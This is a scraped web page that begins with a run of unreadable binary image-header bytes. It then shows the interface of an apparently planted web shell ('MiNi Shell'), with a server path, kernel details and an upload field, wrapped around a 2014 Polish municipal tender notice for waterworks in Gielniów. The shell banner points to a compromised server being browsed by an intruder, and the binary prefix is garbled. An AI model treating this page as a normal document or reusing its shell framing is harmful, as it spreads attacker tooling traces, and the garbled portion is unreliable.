JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140826/282806-N-2014.html

<p class="kh_header"><b>Gielniów: Remont i przebudowa Stacji Uzdatniania Wody Zygmuntów oraz budowa sieci wodociągu przesyłowego z ujęcia wody w Gielniowie do miejscowości Zielonka, Stoczki, Gielniów, Marysin, Zygmuntów, Goździków</b><br>
<b>Numer ogłoszenia: 282806 - 2014; data zamieszczenia: 26.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gielniów , pl. Wolności 75, 26-434 Gielniów, woj. mazowieckie, tel. 048 6720166, faks 048 6720004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gielniow.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa Stacji Uzdatniania Wody Zygmuntów oraz budowa sieci wodociągu przesyłowego z ujęcia wody w Gielniowie do miejscowości Zielonka, Stoczki, Gielniów, Marysin, Zygmuntów, Goździków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 2 części 
Część 1. Etap I
Budowa sieci wodociągowej.
Przedmiotem  zamówienia są kompleksowe roboty w zakresie budowy wodociągu Gielniów - Zielonka . 
1.	Zakres robót montażowych: 
a)	Sieć wodociągowa z rur PEHD 100 SDR 17,6 o średnicy 110mm - 2383,21 mb
b)	Zasuwy wodociągowe kołnierzowe o średnicy 100mm - 2 szt.
c)	Hydranty podziemne z zasuwą kołnierzową o średnicy 80mm - 4 szt.

2.	Do zakresu Wykonawcy należy również:
a)	Organizacja i zabezpieczenie placu budowy,
b)	Projekt organizacji ruchu wraz z  koniecznymi uzgodnieniami ( gdy będzie wymagany),
c)	Uzyskanie stosownych decyzji  wraz z opłatami oraz wykonanie tych decyzji na koszt wykonawcy np. zajęcie pasa drogowego , związanych z realizacją robót  w pobliżu urządzeń wymagających stosownych decyzji , innych niezbędnych przy realizacji zadania ,
d)	Odwodnienie wykopów na czas prowadzonych robót ,
e)	Zabezpieczenie na czas robót istniejącego uzbrojenia  ( np. kabli energetycznych  lub telefonicznych)
f)	Wykonanie wymaganych badań i prób
g)	Przygotowanie dokumentacji do odbioru końcowego,
h)	Likwidacja budowy i uporządkowanie terenu objętego placem budowy
i)	Zabezpieczenie mediów ( woda , prąd , gaz)
j)	Pełna obsługa geodezyjna w trakcie  realizacji zadania wraz z 4 egzemplarzami inwentaryzacji powykonawczej. 


Część  2. Etap II
Remont  i przebudowa stacji uzdatniania wody
Zakres prac obejmuje:
1.	Roboty  instalacyjne wodno - kanalizacyjne i sanitarne polegające  na 
a)	demontażu istniejących urządzeń i instalacji uzdatniania oraz budowie  nowej technologii uzdatniania wody .
b)	zamontowaniu nowych odżelaziaczy , zestawów pompowych dla zasilania sieci wodociągowych.
c)	Wykonaniu w budynku stacji  nowych rurociągów technologicznych w systemie klejowym z PVC z wykorzystaniem istniejącego zbiornika hydroforowego.
d)	Montażu nowej sprężarki i aeratora  
e)	Montażu systemu AKPiA sterującego urządzeniami.

2.	Roboty instalacyjne elektryczne  polegające  na demontażu instalacji istniejącej  w pomieszczeniach podlegających  przebudowie oraz budowie nowej instalacji elektrycznej oświetlenia  i gniazd wtyczkowych oraz rozdzielnicy zasilającej. 
a)	Montaż instalacji elektrycznej obejmuje: 
- wykonanie bruzd pod przewody , otworów , przejść przez ściany 
- montaż rur peschla
- montaż puszek rozgałęźnych  i pod osprzęt
- wciąganie i układanie  przewodów
- montaż osprzętu i opraw oświetleniowych , gniazd , rozdzielnicy
- przyłączenie przewodów do osprzętu
- pomiary ochrony  przeciwpożarowej ,

b)	Demontaż obejmuje istniejącą instalację wraz z oprawami oświetlenia, łącznikami , gniazdami i puszkami instalacyjnymi,

3.	Roboty wykończeniowe w zakresie obiektów budowlanych polegające na :
a)	Dociepleniu ścian zewnętrznych i dachu
b)	Wymianie stolarki okiennej, 
c)	Wykonaniu okładzin ścian wewnątrz budynku z glazury do wysokości 2m 
d)	Ułożeniu gresu na posadzce
e)	Pomalowanie farba emulsyjną ścian powyżej glazury oraz sufitu

Uwaga !

Wskazuje się , że wykonanie robót technologicznych na stacji uzdatniania wody będzie możliwe dopiero po wykonaniu części 1 zamówienia związanej z budową sieci wodociągowej, która zapewni dostawę wody dla poszczególnych miejscowości na czas wyłączenia  z użytkowania  stacji uzdatniania wody spowodowanej wymianą instalacji i  urządzeń technologicznych. 
Szczegółowy  zakres prac w zakresie części  1 i części  2  określa: dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar robót stanowiące załączniki do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 134 ust.6 pkt 3 u.p.z.p., dotychczasowemu Wykonawcy robót budowlanych, w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9, 45.40.00.00-1, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 
Część  1 -  7 000,00 zł  słownie :     siedem tysięcy zł. 
Część  2 -  9 000,00 zł  słownie :     dziewięć tysięcy  zł. 

Okres ważności wadium musi obejmować cały okres związania ofertą. 
Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z 2007r  Nr 42, poz. 275).
 Wadium wnoszone w pieniądzu wpłaca się przelewem na   rachunek  bankowy Zamawiającego :
Bank Spółdzielczy w Przysusze / Oddział w Gielniowie
Nr rachunku : 43914510663000151520000002
 z adnotacją :  Wadium - Przetarg Nr  RGG.271.1.2014 część  ( 1 lub 2 wpisać odpowiednio) 
                                                                                                          
Nie należy wpłacać wadium w kasie Urzędu Gminy ( art. 45 ust.7 ustawy Pzp.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie  żadnych wymagań , których spełnienie Wykonawca zobowiązany  jest wykazać  w sposób szczególny.
Ocena spełniania  tego warunku zostanie dokonana na podstawie złożonego  oświadczenia - zał. Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeżeli Wykonawca wykaże roboty budowlane wykonane w okresie ostatnich pięciu lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy  - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca  wykonania  oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących , czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający za roboty spełniające ten warunek uzna wykazanie co najmniej jednej ważniejszej roboty budowlanej wykonanej w zakresie ,dla Części  1 -  wykonania sieci wodociągowej o wartości  nie mniejszej niż 400 000,00zł brutto,  dla Części  2 - budowy, przebudowy lub remontu stacji uzdatniania wody z instalacją technologiczną o wartości  nie mniejszej niż 450 000,00zł brutto .Ocena spełnienia  tego warunku dokonywana będzie w oparciu o załączony do oferty wykaz robót budowlanych stanowiący załącznik nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie  żadnych wymagań , których spełnienie Wykonawca zobowiązany  jest wykazać  w sposób szczególny.
Ocena spełniania  tego warunku zostanie dokonana na podstawie złożonego  oświadczenia - zał. Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga , aby Wykonawcy ubiegający się o realizację przedmiotowego   zamówienia , dysponowali  następującymi osobami w trakcie realizacji zamówienia  posiadającymi odpowiednie  uprawnienia  zgodnie z przepisami ustawy z dnia 7 lipca   1994r Prawo budowlane (j.t. Dz. U. z 2013r poz. 1409 z późn. zm.) oraz  spełniającymi warunki  do wykonywania   funkcji określonych w ustawie-tzn. będącymi członkami właściwej  izby samorządu zawodowego.
Dopuszcza się odpowiadające uprawnienia budowlane wydane na podstawie      wcześniej obowiązujących przepisów.  
            C z ę ś ć  1-  Kierownik Budowy co najmniej 1 osoba , uprawnienia do kierowania  robotami budowlanymi w specjalności instalacyjnej w zakresie sieci , instalacji i urządzeń cieplnych , wentylacyjnych, gazowych,  wodociągowych i kanalizacyjnych,  
            C z ę ś ć 2 -   Kierownik Budowy   co najmniej 1 osoba ,uprawnienia do kierowania  robotami budowlanymi w specjalności konstrukcyjno   budowlanej bez ograniczeń ;                
Kierownik robót  sanitarnych - uprawnienia budowlane w specjalności instalacyjnej  w zakresie sieci  instalacji i urządzeń cieplnych , wentylacyjnych , gazowych ,wodociągowych i kanalizacyjnych;
Kierownik robót elektrycznych - uprawnienia budowlane  w specjalności 
instalacyjnej w zakresie sieci i instalacji elektrycznych.
                           
Ocena spełniania  tego warunku  dokonana będzie w oparciu o załączony wykaz osób stanowiący załącznik nr 6 do SIWZ oraz oświadczenie zał. nr 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie  żadnych wymagań , których spełnienie Wykonawca zobowiązany  jest wykazać  w sposób szczególny.
Ocena spełniania  tego warunku zostanie dokonana na podstawie złożonego  oświadczenia  zał. Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie , której dokonano wyboru Wykonawcy, z wyjątkiem zmian wynikających z okoliczności opisanych w poniższych punktach.
2. Zmiany do umowy w stosunku do treści wybranej oferty są możliwe, gdy podczas wykonywania zamówienia pojawiły się okoliczności, których w trakcie sporządzania dokumentacji projektowej nie można było przewidzieć i jednocześnie powodują one, że wykonanie robót budowlanych zgodnie z załączoną do SIWZ dokumentacją budowlaną stanowiłoby wadę w prawidłowym funkcjonowaniu obiektu.
3. Zmiany do umowy mogą dotyczyć terminu wykonania zamówienia wyłącznie w przypadkach:
3.1 konieczności wykonania robót zamiennych  ze względu na zasady wiedzy technicznej  i sztuki budowlanej  lub konieczności sporządzenia i uzgodnienia dodatkowej dokumentacji, która wymaga dodatkowego czasu ponad termin wynikający z umowy
3.2 prac lub badań archeologicznych, powodujących konieczność wstrzymania robót objętych niniejszą umową.
3.3  wystąpienia niekorzystnych warunków atmosferycznych, odbiegających znacząco od typowych, uniemożliwiających prowadzenie robót zgodnie z ich technologią  i warunkami technicznymi zapewniającymi  właściwą jakość wykonania, albo innych zdarzeń wymuszających przerwę w realizacji  zamówienia niezależnych od Wykonawcy;  
3.4 okoliczności wynikających z tzw. /siły wyższej/ w rozumieniu kodeksu cywilnego
3.5  udzielenia w trakcie realizacji umowy zamówień dodatkowych związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji, a powodujących konieczność jego wydłużenia.
3.6 pisemnego żądania  wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego lub wydania zakazu prowadzenia prac przez organ administracji publicznej , o ile żądanie  lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność.
3.7  koniecznością uwzględnienia wydanych w toku realizacji prac zaleceń właściwych służb i inspekcji, jeżeli powodują one wydłużenie  czasu realizacji i nie wynikają z przyczyn, za które Wykonawca ponosi odpowiedzialność.
4. Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy  w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy , związanej  ze zmianą sposobu świadczenia Wykonawcy , w następujących przypadkach:
4.1  odstąpienia przez Zamawiającego od wykonania części robót zbędnych do wykonania przedmiotu umowy zgodnie ze sztuką budowlaną i wiedzą techniczną, a wynikających  np. z technologii robót , co skutkować będzie obniżeniem wynagrodzenia należnego Wykonawcy.
4.2 zmian technologicznych, spowodowanych w szczególności następującymi okolicznościami:
4.2.1 niedostępnością na rynku materiałów lub urządzeń, wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania  i odbioru robót, spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń.
4.2.2 możliwością zastosowania  materiałów lub urządzeń o równym lub lepszym standardzie niż przyjęte w projekcie, pozwalających na zaoszczędzenie  kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy lub umożliwiające uzyskanie lepszej jakości robót.
4.2.3 koniecznością zrealizowania  projektu przy zastosowaniu innych rozwiązań technicznych lub technologicznych , niż wskazane  w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót w sytuacji , gdy zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.
4.2.4 wystąpieniem odmiennych od przyjętych w dokumentacji projektowej lub specyfikacji  technicznej wykonania i odbioru robót warunków geologicznych skutkujących brakiem możliwości zrealizowania przedmiotu umowy  przy dotychczasowych założeniach technologicznych.
4.2.5 wystąpieniem odmiennych od przyjętych w dokumentacji projektowej lub specyfikacji  technicznej wykonania i odbioru robót warunków terenowych, a w szczególności istnienia nie zainwentaryzowanych lub błędnie  zainwentaryzowanych obiektów budowlanych.
4.2.6 koniecznością zrealizowania  przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
4.2.7 koniecznością usunięcia sprzeczności w dokumentacji.
4.2.8 koniecznością wykonania robót zamiennych w stosunku do rozwiązań przewidzianych w projekcie, skutkujących  zwiększeniem: bezpieczeństwa realizacji robót, bezpieczeństwa użytkowania , funkcjonalności  obiektu budowlanego lub zmniejszeniem kosztów realizacji inwestycji , usprawnieniem procesu budowlanego, jeżeli rozwiązania zamienne nie odstępują w sposób istotny od zatwierdzonego projektu budowlanego.
4.2.9 koniecznością uwzględnienia  wydanych w toku realizacji robót dodatkowych zaleceń właściwych służb i inspekcji. 
5. Przy modyfikacji zakresu świadczenia Wykonawcy , strony wyodrębniają:
5.1 roboty zamienne, przez które rozumie się roboty , które Wykonawca wykona w zamian za roboty zawarte w pierwotnej dokumentacji projektowej.
5.2 roboty zaniechane , przez które rozumie się roboty objęte pierwotną dokumentacją projektową, a których wykonanie stało się zbędne,
5.3 roboty dodatkowe, przez które rozumie się roboty niezbędne do prawidłowego wykonania przedmiotu umowy, których nie przewidywała  dokumentacja projektowa i których nie można było przewidzieć w chwili podpisania umowy, a które wymagają zlecenia w ramach odrębnego zamówienia.
6. zmiany zakresu świadczenia Wykonawcy, o których mowa w ust. 5 pkt 5.1 i 5.2 mogą nastąpić wyłącznie w formie aneksu do umowy, którego podstawę stanowić będzie sporządzony przez Wykonawcę protokół konieczności , zaakceptowany  przez Inspektora Nadzoru i w razie konieczności Projektanta.
6.1 Protokół konieczności może zostać sporządzony  wyłącznie po udzieleniu pisemnej zgody zamawiającego na dokonanie  zmiany sposobu świadczenia, na wniosek Wykonawcy.
6.2 Skierowany do Zamawiającego wniosek Wykonawcy z propozycją zmiany, zawierał będzie:
6.2.1  Opis propozycji zmiany,
6.2.2   uzasadnienie zmiany,       
6.2.3   obliczenie kosztów zmiany w postaci: 
a) kosztorysu różnicowego dla robót zamiennych, w stosunku do robót przewidzianych umową , zawierającego wycenę robót zamiennych z podaniem podstaw ich kalkulacji w oparciu o czynniki cenotwórcze przyjęte w złożonym przez Wykonawcę kosztorysie  szczegółowym  wraz z harmonogramem  przed podpisaniem niniejszej umowy.
b) kosztorysu na roboty zaniechane  , w stosunku do robót przewidzianych umową. 
6.2.4 rysunki zamienne sporządzone bądź zaakceptowane przez Projektanta, jeżeli zmiana wymaga  dokonania zmian w projekcie.
